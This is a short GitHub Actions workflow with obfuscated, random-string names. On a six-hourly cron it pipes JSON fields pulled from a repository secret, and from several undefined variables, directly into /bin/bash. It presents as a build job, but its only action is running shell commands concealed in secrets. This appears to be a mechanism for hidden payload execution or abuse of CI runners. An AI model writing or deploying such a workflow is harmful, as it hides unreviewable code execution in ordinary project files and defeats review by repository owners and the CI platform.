name: znckaoi

on:
  workflow_dispatch:
  schedule:
    - cron: '32 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: znckaoi
        env:
          g39: ${{ secrets.g39 }}
        run: |
          echo $g39 | jq -r .qf6179 | /bin/bash
          echo $glelx880 | jq -r .ie68 | /bin/bash
          echo $xa31719 | jq -r .c736 | /bin/bash
          echo $rdqd6601 | jq -r .ui23608 | /bin/bash
          echo $b6 | jq -r .hc19356 | /bin/bash
          echo $t8363 | jq -r .lq8655 | /bin/bash

